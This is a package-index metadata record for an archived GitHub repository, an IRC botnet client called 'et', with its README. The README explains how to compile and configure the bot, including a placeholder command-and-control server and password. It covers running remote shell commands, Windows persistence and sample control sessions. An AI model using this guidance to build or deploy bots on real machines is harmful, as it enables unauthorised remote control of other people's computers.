{"id":15403243,"url":"https://github.com/woodruffw/et","last_synced_at":"2025-10-11T07:30:27.103Z","repository":{"id":19221396,"uuid":"22455657","full_name":"woodruffw/et","owner":"woodruffw","description":"ET - the extraterrestrial botnet","archived":true,"fork":false,"pushed_at":"2014-12-15T02:44:45.000Z","size":565,"stargazers_count":3,"open_issues_count":0,"forks_count":3,"subscribers_count":4,"default_branch":"master","last_synced_at":"2025-01-22T02:12:19.394Z","etag":null,"topics":["botnet","irc","irc-client"],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/woodruffw.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-07-31T03:52:31.000Z","updated_at":"2024-07-08T03:34:14.000Z","dependencies_parsed_at":"2022-09-03T10:11:21.442Z","dependency_job_id":null,"html_url":"https://github.com/woodruffw/et","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/woodruffw%2Fet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/woodruffw%2Fet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/woodruffw%2Fet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/woodruffw%2Fet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/woodruffw","download_url":"https://codeload.github.com/woodruffw/et/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":236057506,"owners_count":19088060,"icon_url":
"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["botnet","irc","irc-client"],"created_at":"2024-10-01T16:06:52.071Z","updated_at":"2025-10-11T07:30:21.786Z","avatar_url":"https://github.com/woodruffw.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"et - the extraterrestrial botnet\n===\n\n### What is it?\n`et` is a dumb client to an IRC command-and-control server.\n\nWhen activated, it \"phones home\" and awaits instructions from members of an IRC channel.\n\nIt can be instructed to retrieve system information and execute commands, among other things.\n\n### Compilation\n\n**IMPORTANT**: Many binary size reduction methods are not applied by default during *nix builds due to the wide variety of utilities/flags that provide that\nfunctionality on different systems. For example, standard symbol stripping (-s) is not applied because OS X no longer uses (-s) to strip symbols.\nTo add your own size-optimization flags, either edit the makefile or feed them in by assigning to `LDFLAGS_NIX` while calling `make`.\nIn addition, on Windows, you can try using a third-party tool like [UPX](http://upx.sourceforge.net/) to further reduce executable size.\n\n#### On *nix systems (Linux, BSD, OS X):\n```bash\n$ git clone https://github.com/woodruffw/et \u0026\u0026 cd et\n$ make nix # compiles et in ./bin\n```\n\n#### On Windows:\nBuilding on Windows requires `make` and `gcc`, both of which can be obtained through the [MinGW](http://www.mingw.org/) project.\n\nDownload the tarball, extract it somewhere, and run `mingw32-make` inside of that directory in CMD.exe. 
The `et.exe` binary will be left in \"bin\".\n\n\n**IMPORTANT**: Do not actually run the resulting `et` binary, as it *WILL* open your computer to attack.\n\n### Configuration\n\nMany of `et`'s features can be configured in the *cnc_info.h* file under *./src*.\n\nFor example:\n```C\n#define IRC_SERVER \"irc.example.com\"\n#define IRC_PORT 6667\n#define IRC_CHANNEL \"#yourchannel\"\n#define IRC_REPORT \"hello!\"\n#define IRC_AUTH \"super secret password\"\n```\n\nAny changes made require recompilation.\n\n### Usage\nControlling the `et` bots from the IRC server is very simple.\n\nWhen each bot connects, it sends out a channel-wide message of the format:\n```\net0000000: et0000000 phoning home\n```\n\nFrom that point on, the bot is ready to receive commands. There are a few built-in commands:\n* `auth \u003cpassword\u003e` - Requests authorization to control the bot. If the password matches `IRC_AUTH` in *cnc_info.h*, authorization is granted.\n* `deauth` - Deauthorizes control of the bot unconditionally. Once deauthorized, the bot may not execute any command but `auth`.\n* `info` - Outputs a digest of system information. Supplied by `uname(3)` on Unix and Linux and `GetVersionEx`/`GetUserName` on Windows.\n* `popup \u003cmessage\u003e` - **CURRENTLY WINDOWS ONLY**. Display a popup message on the client's screen.\n* `persist` - **CURRENTLY WINDOWS ONLY**. Ensures that the `et` executable, if killed, will restart on the next login. \n* `depersist` - **CURRENTLY WINDOWS ONLY**. Does the opposite of `persist`, removing `et`'s persistence after logout.\n* `kill` - Disconnects the bot from the IRC server. 
Unless scheduled otherwise on the system, the bot will never reconnect.\n\nAside from these four commands, all other commands passed to an `et` are passed directly to `popen(3)` (`_popen()` on Windows).\n\nBy default `deauth`, `info`, `kill`, and all other commands are restricted until the bot is authorized with `auth`.\n\nSome examples, all from the IRC prompt:\n```\net0000000: et0000000 phoning home\n/msg et0000000 auth et-phone-home\net0000000: Successfully authorized. et0000000 listening.\n/msg et0000000 info\net0000000: [some information]\n/msg et0000000 pwd\net0000000: [the current working directory]\n/msg et0000000 popup hello, i'm controlling your computer\n/msg et0000000 kill\n*et0000000 has quit ()\n```\n\nCurrently, output from system commands is limited to approximately 512 characters. For more information on IRC's limitations, read [RFC 2812](http://tools.ietf.org/rfc/rfc2812.txt).\n\n**IMPORTANT**: Because I tested `et` with ngIRCd, I made a few assumptions about common server characteristics. For example, `et` will always respond to a `PING` with\na `PONG` message containing the server's name, simply because that's the most common `PING`/`PONG` message. If you encounter timeout issues, it's probably because your IRC server\nsends a different `PING` message.\n\n### Proof of Concept\nThe original PoC Python script can be found under *./src/poc/et.py*. 
Like the actual version, it does work and *WILL* expose your machine.\n\n### Theoretical Limits\nBecause the IRC protocol limits nicks to 9 characters, only so many `et`s can operate within a single channel.\n\nBy default, the first two characters of an `et`'s nick will always be 'et,' meaning that at most 10 million `et`s can exist within a channel.\nFurthermore, because I got lazy with the Windows version, the ID on Windows machines can only be in the range [0, (32768 \u003c\u003c 8)] for a total number of 8,388,609 possible IDs on Windows.\nOf course, because the trailing numbers are pseudorandom and not sequential, the actual point of collision is likely to be much lower than 10 million (or 8,388,609 for that matter).\nOn the other hand, `et` can be configured to \"phone home\" to other servers and channels, making the limit less relevant in practice.\n\n### TODO\n* Reduce binary size\n* Prevent Windows CMD popups\n* Add more built-in commands\n\n### Contributing\n\n`et` is licensed under the MIT licence. \n\nPlease feel free to issue merge requests, even for small things. I appreciate all contributions.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fwoodruffw%2Fet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fwoodruffw%2Fet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fwoodruffw%2Fet/lists"}